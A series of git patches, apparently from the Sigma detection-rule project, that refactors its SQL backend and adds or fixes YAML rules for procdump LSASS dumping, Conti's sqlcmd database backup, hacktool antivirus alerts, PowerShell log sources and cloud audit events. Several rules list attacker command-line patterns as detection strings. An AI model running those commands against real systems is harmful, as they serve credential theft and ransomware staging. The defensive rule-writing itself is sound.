a/tools/sigma/backends/sql.py +++ b/tools/sigma/backends/sql.py @@ -45,19 +45,21 @@ class SQLBackend(SingleTextQueryBackend): mapLength = "(%s %s)" options = SingleTextQueryBackend.options + ( - ("table", False, "Use this option to specify table name, default is \"eventlog\"", None), + ("table", "eventlog", "Use this option to specify table name.", None), + ("select", "*", "Use this option to specify fields you want to select. Example: \"--backend-option select=xxx,yyy\"", None), ) def __init__(self, sigmaconfig, options): super().__init__(sigmaconfig) + if "table" in options: self.table = options["table"] else: self.table = "eventlog" - if "select" in options: + if "select" in options and options["select"]: self.select_fields = options["select"].split(',') else: self.select_fields = list() From 16269c0d6388b15f72cf5ca416496a66199a22e5 Mon Sep 17 00:00:00 2001 From: Theo Guidoux Date: Mon, 16 Aug 2021 10:47:05 +0200 Subject: [PATCH 0394/1367] cleaner default value handling --- tools/sigma/backends/sql.py | 8 ++------ 1 file changed, 2 insertions(+), 6 deletions(-) diff --git a/tools/sigma/backends/sql.py b/tools/sigma/backends/sql.py index 18f8ab30..31afbb58 100644 --- a/tools/sigma/backends/sql.py +++ b/tools/sigma/backends/sql.py @@ -48,7 +48,6 @@ class SQLBackend(SingleTextQueryBackend): ("table", "eventlog", "Use this option to specify table name.", None), ("select", "*", "Use this option to specify fields you want to select. Example: \"--backend-option select=xxx,yyy\"", None), ) - def __init__(self, sigmaconfig, options): @@ -62,7 +61,7 @@ class SQLBackend(SingleTextQueryBackend): if "select" in options and options["select"]: self.select_fields = options["select"].split(',') else: - self.select_fields = list() + self.select_fields = list("*") def generateANDNode(self, node): generated = [ self.generateNode(val) for val in node ] @@ -197,10 +196,7 @@ class SQLBackend(SingleTextQueryBackend): if self._recursiveFtsSearch(parsed.parsedSearch): raise NotImplementedError("FullTextSearch not implemented for SQL Backend.") result = self.generateNode(parsed.parsedSearch) - select = "*" - - if self.select_fields: - select = ", ".join(self.select_fields) + select = ", ".join(self.select_fields) if parsed.parsedAgg: #Handle aggregation From 79bc89b3447e9fdb7171f61f77839d1515b4cad5 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Mon, 16 Aug 2021 10:57:03 +0200 Subject: [PATCH 0395/1367] rule: av hacktool events --- rules/windows/malware/av_hacktool.yml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 rules/windows/malware/av_hacktool.yml diff --git a/rules/windows/malware/av_hacktool.yml b/rules/windows/malware/av_hacktool.yml new file mode 100644 index 00000000..fe2fa7cf --- /dev/null +++ b/rules/windows/malware/av_hacktool.yml @@ -0,0 +1,25 @@ +title: Antivirus Hacktool Detection +id: fa0c05b6-8ad3-468d-8231-c1cbccb64fba +description: Detects a highly relevant Antivirus alert that reports a hack tool or other attack tool +date: 2021/08/16 +author: Florian Roth +references: + - https://www.nextron-systems.com/2021/08/16/antivirus-event-analysis-cheat-sheet-v1-8-2/ +logsource: + product: antivirus +detection: + selection: + - Signature|startswith: + - 'HTOOL' + - 'HKTL' + - 'SecurityTool' + - 'ATK/' # Sophos + - Signature|contains: + - 'Hacktool' + condition: selection +fields: + - FileName + - User +falsepositives: + - Unlikely +level: high From a70607bce7d2319e18ca079619b0844053f1f0f7 Mon Sep 17 00:00:00 2001 From: frack113 Date: Mon, 16 Aug 2021 11:08:19 +0200 Subject: [PATCH 0396/1367] add process_creation_coti_sqlcmd.yml --- .../process_creation_coti_sqlcmd.yml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 rules/windows/process_creation/process_creation_coti_sqlcmd.yml diff --git a/rules/windows/process_creation/process_creation_coti_sqlcmd.yml b/rules/windows/process_creation/process_creation_coti_sqlcmd.yml new file mode 100644 index 00000000..becce241 --- /dev/null +++ b/rules/windows/process_creation/process_creation_coti_sqlcmd.yml @@ -0,0 +1,31 @@ +title: Conti backup Database +id: 2f47f1fd-0901-466e-a770-3b7092834a1b +status: experimental +author: frack113 +date: 2021/08/16 +description: Detects a command used by conti to dump database +references: + - https://twitter.com/vxunderground/status/1423336151860002816?s=20 #the leak info not the files itself + - https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection + - https://docs.microsoft.com/en-us/sql/tools/sqlcmd-utility?view=sql-server-ver15 +tags: + - attack.collection +logsource: + category: process_creation + product: windows +detection: + selection_tools: + CommandLine|contains|: + - 'sqlcmd ' + - 'sqlcmd.exe' + selection_svr: + CommandLine|contains|: ' -S localhost ' + selection_query: + CommandLine|contains|: + - 'sys.sysprocesses' + - 'master.dbo.sysdatabases' + - 'BACKUP DATABASE' + condition: all of them +falsepositives: + - Unknown +level: medium From a861f55e5c77b8914797435dfae9f05191685b38 Mon Sep 17 00:00:00 2001 From: frack113 Date: Mon, 16 Aug 2021 11:15:32 +0200 Subject: [PATCH 0397/1367] fix title --- .../windows/process_creation/process_creation_coti_sqlcmd.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/process_creation/process_creation_coti_sqlcmd.yml b/rules/windows/process_creation/process_creation_coti_sqlcmd.yml index becce241..e1e426cb 100644 --- a/rules/windows/process_creation/process_creation_coti_sqlcmd.yml +++ b/rules/windows/process_creation/process_creation_coti_sqlcmd.yml @@ -1,4 +1,4 @@ -title: Conti backup Database +title: Conti Backup Database id: 2f47f1fd-0901-466e-a770-3b7092834a1b status: experimental author: frack113 @@ -28,4 +28,4 @@ detection: condition: all of them falsepositives: - Unknown -level: medium +level: high From fda11e360833686311c41b24bb068134a01fc512 Mon Sep 17 00:00:00 2001 From: frack113 Date: Mon, 16 Aug 2021 11:22:50 +0200 Subject: [PATCH 0398/1367] fix very bad cut and paste --- .../process_creation/process_creation_coti_sqlcmd.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/rules/windows/process_creation/process_creation_coti_sqlcmd.yml b/rules/windows/process_creation/process_creation_coti_sqlcmd.yml index e1e426cb..2b141c5d 100644 --- a/rules/windows/process_creation/process_creation_coti_sqlcmd.yml +++ b/rules/windows/process_creation/process_creation_coti_sqlcmd.yml @@ -15,13 +15,13 @@ logsource: product: windows detection: selection_tools: - CommandLine|contains|: + CommandLine|contains: - 'sqlcmd ' - 'sqlcmd.exe' selection_svr: - CommandLine|contains|: ' -S localhost ' + CommandLine|contains: ' -S localhost ' selection_query: - CommandLine|contains|: + CommandLine|contains: - 'sys.sysprocesses' - 'master.dbo.sysdatabases' - 'BACKUP DATABASE' From 2dbf9af27d5317fc1d11a6c009d9bec5e0c01661 Mon Sep 17 00:00:00 2001 From: frack113 Date: Mon, 16 Aug 2021 12:56:24 +0200 Subject: [PATCH 0399/1367] add definition to powershell-classic --- ...susp_athremotefxvgpudisablementcommand.yml | 1 + .../windows/builtin/win_susp_zip_compress.yml | 1 + .../powershell_alternate_powershell_hosts.yml | 20 +++++++++---------- ...powershell_delete_volume_shadow_copies.yml | 1 + .../powershell_downgrade_attack.yml | 1 + .../powershell/powershell_exe_calling_ps.yml | 1 + .../powershell/powershell_powercat.yml | 2 +- .../powershell_remote_powershell_session.yml | 1 + .../powershell_renamed_powershell.yml | 1 + .../powershell_suspicious_download.yml | 1 + ...owershell_tamper_with_windows_defender.yml | 4 +++- .../powershell/powershell_xor_commandline.yml | 1 + 12 files changed, 23 insertions(+), 12 deletions(-) diff --git a/rules/windows/builtin/win_susp_athremotefxvgpudisablementcommand.yml b/rules/windows/builtin/win_susp_athremotefxvgpudisablementcommand.yml index 6ed6682d..e4d35a7b 100644 --- a/rules/windows/builtin/win_susp_athremotefxvgpudisablementcommand.yml +++ b/rules/windows/builtin/win_susp_athremotefxvgpudisablementcommand.yml @@ -37,6 +37,7 @@ detection: logsource: product: windows service: powershell-classic + definition: fields have to be extract from event detection: selection_cmd: HostApplication|contains: 'Invoke-ATHRemoteFXvGPUDisablementCommand ' diff --git a/rules/windows/builtin/win_susp_zip_compress.yml b/rules/windows/builtin/win_susp_zip_compress.yml index b4bb1bbb..5534e42b 100644 --- a/rules/windows/builtin/win_susp_zip_compress.yml +++ b/rules/windows/builtin/win_susp_zip_compress.yml @@ -29,6 +29,7 @@ detection: logsource: product: windows service: powershell-classic + definition: fields have to be extract from event detection: selection: HostApplication|contains|all: diff --git a/rules/windows/powershell/powershell_alternate_powershell_hosts.yml b/rules/windows/powershell/powershell_alternate_powershell_hosts.yml index dcf6fb16..cd7b3b56 100644 --- a/rules/windows/powershell/powershell_alternate_powershell_hosts.yml +++ b/rules/windows/powershell/powershell_alternate_powershell_hosts.yml @@ -4,7 +4,7 @@ id: 64e8e417-c19a-475a-8d19-98ea705394cc description: Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe status: experimental date: 2019/08/11 -modified: 2021/08/03 +modified: 2021/08/16 author: Roberto Rodriguez @Cyb3rWard0g references: - https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190815181010.html @@ -17,14 +17,6 @@ falsepositives: - MSP Detection Searcher - Citrix ConfigSync.ps1 level: medium -detection: - filter: - - ContextInfo: 'powershell.exe' - - Message: 'powershell.exe' - # Both fields contain key=value pairs where the key HostApplication is relevant but - # can't be referred directly as event field. - condition: selection and not filter - --- logsource: product: windows @@ -33,11 +25,19 @@ detection: selection: EventID: 4103 ContextInfo: '*' + filter: + ContextInfo: 'powershell.exe' + condition: selection and not filter --- logsource: product: windows service: powershell-classic + definition: fields have to be extract from event detection: selection: EventID: 400 - ContextInfo: '*' \ No newline at end of file + HostApplication: '*' +detection: + filter: + HostApplication: 'powershell.exe' + condition: selection and not filter \ No newline at end of file diff --git a/rules/windows/powershell/powershell_delete_volume_shadow_copies.yml b/rules/windows/powershell/powershell_delete_volume_shadow_copies.yml index b899f3a9..456b0b2d 100644 --- a/rules/windows/powershell/powershell_delete_volume_shadow_copies.yml +++ b/rules/windows/powershell/powershell_delete_volume_shadow_copies.yml @@ -15,6 +15,7 @@ modified: 2021/08/03 logsource: product: windows service: powershell-classic + definition: fields have to be extract from event detection: selection_obj: CommandLine|contains|all: diff --git a/rules/windows/powershell/powershell_downgrade_attack.yml b/rules/windows/powershell/powershell_downgrade_attack.yml index 92e009c4..8ace36f2 100644 --- a/rules/windows/powershell/powershell_downgrade_attack.yml +++ b/rules/windows/powershell/powershell_downgrade_attack.yml @@ -14,6 +14,7 @@ date: 2017/03/22 logsource: product: windows service: powershell-classic + definition: fields have to be extract from event detection: selection: EventID: 400 diff --git a/rules/windows/powershell/powershell_exe_calling_ps.yml b/rules/windows/powershell/powershell_exe_calling_ps.yml index 4785ccf2..95749b73 100644 --- a/rules/windows/powershell/powershell_exe_calling_ps.yml +++ b/rules/windows/powershell/powershell_exe_calling_ps.yml @@ -14,6 +14,7 @@ date: 2017/03/05 logsource: product: windows service: powershell-classic + definition: fields have to be extract from event detection: selection1: EventID: 400 diff --git a/rules/windows/powershell/powershell_powercat.yml b/rules/windows/powershell/powershell_powercat.yml index ab4bf464..553a8059 100644 --- a/rules/windows/powershell/powershell_powercat.yml +++ b/rules/windows/powershell/powershell_powercat.yml @@ -19,6 +19,7 @@ level: medium logsource: product: windows service: powershell-classic + definition: fields have to be extract from event detection: selection: EventID: 400 @@ -30,7 +31,6 @@ detection: logsource: product: windows service: powershell - detection: selection: EventID: 4103 diff --git a/rules/windows/powershell/powershell_remote_powershell_session.yml b/rules/windows/powershell/powershell_remote_powershell_session.yml index f2b4587a..3e345947 100644 --- a/rules/windows/powershell/powershell_remote_powershell_session.yml +++ b/rules/windows/powershell/powershell_remote_powershell_session.yml @@ -32,6 +32,7 @@ detection: logsource: product: windows service: powershell-classic + definition: fields have to be extract from event detection: selection: EventID: 400 diff --git a/rules/windows/powershell/powershell_renamed_powershell.yml b/rules/windows/powershell/powershell_renamed_powershell.yml index e1b90910..97bde1b5 100644 --- a/rules/windows/powershell/powershell_renamed_powershell.yml +++ b/rules/windows/powershell/powershell_renamed_powershell.yml @@ -13,6 +13,7 @@ tags: logsource: product: windows service: powershell-classic + definition: fields have to be extract from event detection: selection: EventID: 400 diff --git a/rules/windows/powershell/powershell_suspicious_download.yml b/rules/windows/powershell/powershell_suspicious_download.yml index 73626bb1..1548d8cb 100644 --- a/rules/windows/powershell/powershell_suspicious_download.yml +++ b/rules/windows/powershell/powershell_suspicious_download.yml @@ -28,6 +28,7 @@ detection: logsource: product: windows service: powershell-classic + definition: fields have to be extract from event detection: downloadfile: EventID: 400 # get 400 ,403 and 600 for 1 execution diff --git a/rules/windows/powershell/powershell_tamper_with_windows_defender.yml b/rules/windows/powershell/powershell_tamper_with_windows_defender.yml index 4e4e4dcc..3f32386d 100644 --- a/rules/windows/powershell/powershell_tamper_with_windows_defender.yml +++ b/rules/windows/powershell/powershell_tamper_with_windows_defender.yml @@ -9,12 +9,14 @@ references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md author: frack113 date: 2021/06/07 +modified: 2021/08/16 falsepositives: - Unknown level: high logsource: product: windows - category: powershell-classic + service: powershell-classic + definition: fields have to be extract from event detection: select_EventID: EventID: 600 diff --git a/rules/windows/powershell/powershell_xor_commandline.yml b/rules/windows/powershell/powershell_xor_commandline.yml index 43addcfb..74905593 100644 --- a/rules/windows/powershell/powershell_xor_commandline.yml +++ b/rules/windows/powershell/powershell_xor_commandline.yml @@ -11,6 +11,7 @@ tags: logsource: product: windows service: powershell-classic + definition: fields have to be extract from event detection: selection: EventID: 400 From 911579023cb3759bf88eee33f6fe501542891cd5 Mon Sep 17 00:00:00 2001 From: frack113 Date: Mon, 16 Aug 2021 13:30:45 +0200 Subject: [PATCH 0400/1367] fix powershell_alternate_powershell_hosts.yml --- .../windows/powershell/powershell_alternate_powershell_hosts.yml | 1 - 1 file changed, 1 deletion(-) diff --git a/rules/windows/powershell/powershell_alternate_powershell_hosts.yml b/rules/windows/powershell/powershell_alternate_powershell_hosts.yml index cd7b3b56..22389518 100644 --- a/rules/windows/powershell/powershell_alternate_powershell_hosts.yml +++ b/rules/windows/powershell/powershell_alternate_powershell_hosts.yml @@ -37,7 +37,6 @@ detection: selection: EventID: 400 HostApplication: '*' -detection: filter: HostApplication: 'powershell.exe' condition: selection and not filter \ No newline at end of file From c1876b9ff68af739f55889f09e1cadcedf982c1b Mon Sep 17 00:00:00 2001 From: Theo Guidoux Date: Mon, 16 Aug 2021 13:33:43 +0200 Subject: [PATCH 0401/1367] add fields from rules to query + sqlite --- tools/sigma/backends/sql.py | 60 +++++++++++++++++++++++++++++++--- tools/sigma/backends/sqlite.py | 15 +++------ 2 files changed, 61 insertions(+), 14 deletions(-) diff --git a/tools/sigma/backends/sql.py b/tools/sigma/backends/sql.py index 31afbb58..f18cac2f 100644 --- a/tools/sigma/backends/sql.py +++ b/tools/sigma/backends/sql.py @@ -21,7 +21,6 @@ import sigma from sigma.backends.base import SingleTextQueryBackend from sigma.parser.condition import SigmaAggregationParser, NodeSubexpression, ConditionAND, ConditionOR, ConditionNOT from sigma.parser.exceptions import SigmaParseError - class SQLBackend(SingleTextQueryBackend): """Converts Sigma rule into SQL query""" identifier = "sql" @@ -61,7 +60,7 @@ class SQLBackend(SingleTextQueryBackend): if "select" in options and options["select"]: self.select_fields = options["select"].split(',') else: - self.select_fields = list("*") + self.select_fields = list() def generateANDNode(self, node): generated = [ self.generateNode(val) for val in node ] @@ -142,6 +141,47 @@ class SQLBackend(SingleTextQueryBackend): """ return fieldname + def generate(self, sigmaparser): + """Method is called for each sigma rule and receives the parsed rule (SigmaParser)""" + fields = list() + + # First add fields specified in the rule + try: + for field in sigmaparser.parsedyaml["fields"]: + mapped = sigmaparser.config.get_fieldmapping(field).resolve_fieldname(field, sigmaparser) + if type(mapped) == str: + fields.append(mapped) + elif type(mapped) == list: + fields.extend(mapped) + else: + raise TypeError("Field mapping must return string or list") + + except KeyError: # no 'fields' attribute + pass + + # Then add fields specified in the backend configuration + fields.extend(self.select_fields) + + # Finally, in case fields is empty, add the default value + if not fields: + fields = list("*") + + for parsed in sigmaparser.condparsed: + #query = self.generateQuery(parsed) + query = self._generateQueryWithFields(parsed, fields) + before = self.generateBefore(parsed) + after = self.generateAfter(parsed) + + result = "" + if before is not None: + result = before + if query is not None: + result += query + if after is not None: + result += after + + return result + def cleanValue(self, val): if not isinstance(val, str): return str(val) @@ -191,12 +231,24 @@ class SQLBackend(SingleTextQueryBackend): return temp_table, agg_condition raise NotImplementedError("{} aggregation not implemented in SQL Backend".format(agg.aggfunc_notrans)) - + def generateQuery(self, parsed): + return self._generateQueryWithFields(parsed, list("*")) + + def checkFTS(self, parsed, result): if self._recursiveFtsSearch(parsed.parsedSearch): raise NotImplementedError("FullTextSearch not implemented for SQL Backend.") + + def _generateQueryWithFields(self, parsed, fields): + """ + Return a SQL query with fields specified. + """ + result = self.generateNode(parsed.parsedSearch) - select = ", ".join(self.select_fields) + + self.checkFTS(parsed, result) + + select = ", ".join(fields) if parsed.parsedAgg: #Handle aggregation diff --git a/tools/sigma/backends/sqlite.py b/tools/sigma/backends/sqlite.py index 8eec13ea..1f7e4e7e 100644 --- a/tools/sigma/backends/sqlite.py +++ b/tools/sigma/backends/sqlite.py @@ -18,7 +18,6 @@ from sigma.backends.sql import SQLBackend from sigma.parser.condition import NodeSubexpression, ConditionAND, ConditionOR, ConditionNOT import re - class SQLiteBackend(SQLBackend): """Converts Sigma rule into SQL query for SQLite""" identifier = "sqlite" @@ -26,6 +25,8 @@ class SQLiteBackend(SQLBackend): mapFullTextSearch = "%s MATCH ('\"%s\"')" + countFTS = 0 + def __init__(self, sigmaconfig, table): super().__init__(sigmaconfig, table) self.mappingItem = False @@ -108,16 +109,10 @@ class SQLiteBackend(SQLBackend): return self.generateFTS(self.cleanValue(str(node))) def generateQuery(self, parsed): - self.countFTS = 0 - result = self.generateNode(parsed.parsedSearch) + return self._generateQueryWithFields(parsed, list("*")) + + def checkFTS(self, parsed, result): if self.countFTS > 1: raise NotImplementedError( "Match operator ({}) is allowed only once in SQLite, parse rule in a different way:\n{}".format(self.countFTS, result)) self.countFTS = 0 - - if parsed.parsedAgg: - # Handle aggregation - fro, whe = self.generateAggregation(parsed.parsedAgg, result) - return "SELECT * FROM {} WHERE {}".format(fro, whe) - - return "SELECT * FROM {} WHERE {}".format(self.table, result) From 3028eb68b64b6293678931611c072b98ff27ce7a Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Mon, 16 Aug 2021 13:55:00 +0200 Subject: [PATCH 0402/1367] refactoring: procdump rules --- ...sysmon_lsass_memory_dump_file_creation.yml | 5 ++-- .../windows/process_creation/win_procdump.yml | 28 +++++++++++++++++++ .../process_creation/win_renamed_procdump.yml | 16 +++++------ .../process_creation/win_susp_procdump.yml | 6 ++-- 4 files changed, 43 insertions(+), 12 deletions(-) create mode 100644 rules/windows/process_creation/win_procdump.yml diff --git a/rules/windows/file_event/sysmon_lsass_memory_dump_file_creation.yml b/rules/windows/file_event/sysmon_lsass_memory_dump_file_creation.yml index b61b425a..277c0b97 100755 --- a/rules/windows/file_event/sysmon_lsass_memory_dump_file_creation.yml +++ b/rules/windows/file_event/sysmon_lsass_memory_dump_file_creation.yml @@ -5,7 +5,7 @@ author: Teymur Kheirkhabarov, oscd.community references: - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment date: 2019/10/22 -modified: 2020/08/23 +modified: 2021/08/16 tags: - attack.credential_access - attack.t1003 # an old one @@ -23,5 +23,6 @@ fields: - TargetFileName falsepositives: - Dumping lsass memory for forensic investigation purposes by legitimate incident responder or forensic invetigator -level: medium + - Dumps of another process that contains lsass in its process name (substring) +level: high status: experimental diff --git a/rules/windows/process_creation/win_procdump.yml b/rules/windows/process_creation/win_procdump.yml new file mode 100644 index 00000000..1f02d04b --- /dev/null +++ b/rules/windows/process_creation/win_procdump.yml @@ -0,0 +1,28 @@ +title: Procdump Usage +id: 03795938-1387-481b-9f4c-3f6241e604fe +description: Detects uses of the SysInternals Procdump utility +status: experimental +references: + - Internal Research +author: Florian Roth +date: 2021/08/16 +tags: + - attack.defense_evasion + - attack.t1036 + - attack.t1003.001 +logsource: + category: process_creation + product: windows +detection: + selection1: + Image|endswith: + - '\procdump.exe' + - '\procdump64.exe' + selection2: + CommandLine|contains|all: + - ' -ma ' + - '.exe' + condition: selection1 or selection2 +falsepositives: + - Legitimate use of procdump by a developer or administrator +level: medium diff --git a/rules/windows/process_creation/win_renamed_procdump.yml b/rules/windows/process_creation/win_renamed_procdump.yml index 8b9bad99..88783c5d 100644 --- a/rules/windows/process_creation/win_renamed_procdump.yml +++ b/rules/windows/process_creation/win_renamed_procdump.yml @@ -6,7 +6,7 @@ references: - https://docs.microsoft.com/en-us/sysinternals/downloads/procdump author: Florian Roth date: 2019/11/18 -modified: 2021/04/29 +modified: 2021/08/16 tags: - attack.defense_evasion - attack.t1036 # an old one @@ -17,19 +17,19 @@ logsource: detection: selection1: OriginalFileName: 'procdump' - filter1: - Image|endswith: - - '\procdump.exe' - - '\procdump64.exe' selection2: CommandLine|contains|all: - ' -ma ' - ' -accepteula ' - filter2: - CommandLine|contains: + selection3: + CommandLine|contains|all: + - ' -ma ' + - '.dmp' + filter: + Image|endswith: - '\procdump.exe' - '\procdump64.exe' - condition: ( selection1 and not filter1 ) or ( selection2 and not filter2 ) + condition: ( selection1 or selection2 or selection3 ) and not filter falsepositives: - Procdump illegaly bundled with legitimate software - Weird admins who renamed binaries diff --git a/rules/windows/process_creation/win_susp_procdump.yml b/rules/windows/process_creation/win_susp_procdump.yml index 4a700b6a..288002fa 100644 --- a/rules/windows/process_creation/win_susp_procdump.yml +++ b/rules/windows/process_creation/win_susp_procdump.yml @@ -1,11 +1,12 @@ title: Suspicious Use of Procdump id: 03795938-1387-481b-9f4c-3f6241e604fe -description: Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter ' -ma '. This way we're also able to catch cases in which the attacker has renamed the procdump executable. +description: Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter ' -ma ' and ' -accepteula' in a single step. This way we're also able to catch cases in which the attacker has renamed the procdump executable. status: experimental references: - Internal Research author: Florian Roth date: 2021/02/02 +modified: 2021/08/16 tags: - attack.defense_evasion - attack.t1036 @@ -17,8 +18,9 @@ detection: selection: CommandLine|contains: - ' -ma ' + - ' -accepteula ' condition: selection falsepositives: - Another tool that uses the command line switches of Procdump - Legitimate use of procdump by a developer or administrator -level: medium +level: high \ No newline at end of file From e1b99db1497b0e0b333b6c97ba63de8aac3b1893 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Mon, 16 Aug 2021 15:50:14 +0200 Subject: [PATCH 0403/1367] fix duplicate uuid --- rules/windows/process_creation/win_procdump.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/win_procdump.yml b/rules/windows/process_creation/win_procdump.yml index 1f02d04b..697a761b 100644 --- a/rules/windows/process_creation/win_procdump.yml +++ b/rules/windows/process_creation/win_procdump.yml @@ -1,5 +1,5 @@ title: Procdump Usage -id: 03795938-1387-481b-9f4c-3f6241e604fe +id: 2e65275c-8288-4ab4-aeb7-6274f58b6b20 description: Detects uses of the SysInternals Procdump utility status: experimental references: From d2790f24507212702653c9502a0ba57a0663cc24 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Mon, 16 Aug 2021 16:14:48 +0200 Subject: [PATCH 0404/1367] fix: missing "|all" modifier --- rules/windows/process_creation/win_susp_procdump.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/process_creation/win_susp_procdump.yml b/rules/windows/process_creation/win_susp_procdump.yml index 288002fa..7c3256d9 100644 --- a/rules/windows/process_creation/win_susp_procdump.yml +++ b/rules/windows/process_creation/win_susp_procdump.yml @@ -16,11 +16,11 @@ logsource: product: windows detection: selection: - CommandLine|contains: + CommandLine|contains|all: - ' -ma ' - ' -accepteula ' condition: selection falsepositives: - Another tool that uses the command line switches of Procdump - Legitimate use of procdump by a developer or administrator -level: high \ No newline at end of file +level: high From c7831a3d70e48a9576bd43e438ad918cab545fb6 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 16 Aug 2021 09:45:31 -0500 Subject: [PATCH 0405/1367] Update gcp_vpn_tunnel_modified_or_deleted.yml --- .../gcp_vpn_tunnel_modified_or_deleted.yml | 25 +++++++++++++++++-- 1 file changed, 23 insertions(+), 2 deletions(-) diff --git a/rules/cloud/gcp/gcp_vpn_tunnel_modified_or_deleted.yml b/rules/cloud/gcp/gcp_vpn_tunnel_modified_or_deleted.yml index 139597f9..9c2e9c01 100644 --- a/rules/cloud/gcp/gcp_vpn_tunnel_modified_or_deleted.yml +++ b/rules/cloud/gcp/gcp_vpn_tunnel_modified_or_deleted.yml @@ -1,2 +1,23 @@ - - +title: Google Cloud VPN Tunnel Modified or Deleted +id: 99980a85-3a61-43d3-ac0f-b68d6b4797b1 +description: Identifies when a VPN Tunnel Modified or Deleted in Google Cloud. +author: Austin Songer +status: experimental +date: 2021/08/16 +references: + - https://any-api.com/googleapis_com/compute/docs/vpnTunnels +logsource: + service: gcp.audit +detection: + selection: + gcp.audit.method_name: + - compute.vpnTunnels.insert + - compute.vpnTunnels.delete + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - VPN Tunnel being modified or deleted may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - VPN Tunnel modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From ed507b82f42f5f41c52ec90e2594ea25af4cb8fb Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 16 Aug 2021 09:58:48 -0500 Subject: [PATCH 0406/1367] Update and rename aws_eks_cluster_modified_or_deleted.yml to aws_eks_cluster_created_or_deleted.yml --- .../aws_eks_cluster_created_or_deleted.yml | 25 +++++++++++++++++++ .../aws_eks_cluster_modified_or_deleted.yml | 1 - 2 files changed, 25 insertions(+), 1 deletion(-) create mode 100644 rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml delete mode 100644 rules/cloud/aws/aws_eks_cluster_modified_or_deleted.yml diff --git a/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml b/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml new file mode 100644 index 00000000..1c07e6bb --- /dev/null +++ b/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml @@ -0,0 +1,25 @@ + +title: AWS EKS Cluster Created or Deleted +id: 33d50d03-20ec-4b74-a74e-1e65a38af1c0 +description: Identifies when an EKS cluster is created or deleted. +author: Austin Songer +status: experimental +date: 2021/08/16 +references: + - https://any-api.com/amazonaws_com/eks/docs/API_Description +logsource: + service: cloudtrail +detection: + selection: + eventSource: eks.amazonaws.com + eventName: + - CreateCluster + - DeleteCluster + condition: selection +level: low +tags: + - attack. +falsepositives: + - EKS Cluster being created or deleted may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - EKS Cluster created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. diff --git a/rules/cloud/aws/aws_eks_cluster_modified_or_deleted.yml b/rules/cloud/aws/aws_eks_cluster_modified_or_deleted.yml deleted file mode 100644 index 8b137891..00000000 --- a/rules/cloud/aws/aws_eks_cluster_modified_or_deleted.yml +++ /dev/null @@ -1 +0,0 @@ - From 76d956e11033d651e8410741f78b856a94c2a548 Mon Sep 17 00:00:00 2001 From: frack113 Date: Mon, 16 Aug 2021 18:12:17 +0200 Subject: [PATCH 0407/1367] update test_missing_id --- tests/test_rules.py | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/tests/test_rules.py b/tests/test_rules.py index e3fac59b..8abaaf80 100755 --- a/tests/test_rules.py +++ b/tests/test_rules.py @@ -234,7 +234,7 @@ class TestRules(unittest.TestCase): def test_missing_id(self): faulty_rules = [] - list_id = [] + dict_id = {} for file in self.yield_next_rule_file_path(self.path_to_rules): id = self.get_rule_part(file_path=file, part_name="id") if not id: @@ -243,11 +243,11 @@ class TestRules(unittest.TestCase): elif len(id) != 36: print(Fore.YELLOW + "Rule {} has a malformed 'id' (not 36 chars).".format(file)) faulty_rules.append(file) - elif id in list_id: - print(Fore.YELLOW + "Rule {} has a duplicate 'id'.".format(file)) + elif id in dict_id.keys(): + print(Fore.YELLOW + "Rule {} has the same 'id' than {} must be unique.".format(file,dict_id[id])) faulty_rules.append(file) else: - list_id.append(id) + dict_id[id] = file self.assertEqual(faulty_rules, [], Fore.RED + "There are rules with missing or malformed 'id' fields. Create an id (e.g. here: https://www.uuidgenerator.net/version4) and add it to the reported rule(s).") From 06840be3e7fa65d9fd12031786dbc13c70b1f41d Mon Sep 17 00:00:00 2001 From: frack113 Date: Mon, 16 Aug 2021 18:46:25 +0200 Subject: [PATCH 0408/1367] fix author --- rules/windows/builtin/win_anomaly_process_execution.yml | 1 + rules/windows/builtin/win_powershelll_empire.yml | 1 + rules/windows/builtin/win_user_acc_added_removed.yml | 1 + rules/windows/builtin/win_user_acc_enabled_disabled.yml | 1 + .../windows/builtin/win_user_created_added_to_bultin_admins.yml | 1 + 5 files changed, 5 insertions(+) diff --git a/rules/windows/builtin/win_anomaly_process_execution.yml b/rules/windows/builtin/win_anomaly_process_execution.yml index 176d64bd..c49f18c2 100644 --- a/rules/windows/builtin/win_anomaly_process_execution.yml +++ b/rules/windows/builtin/win_anomaly_process_execution.yml @@ -1,6 +1,7 @@ title: Process Execution Anomaly id: 2c55fe7a-b06f-4029-a5b9-c54a2320d7b8 description: 'Identifies anomalous executions of sensitive processes which are often leveraged as attack vectors.' +author: sawwinnnaung references: - Azure Sentinel date: 2021/08/15 diff --git a/rules/windows/builtin/win_powershelll_empire.yml 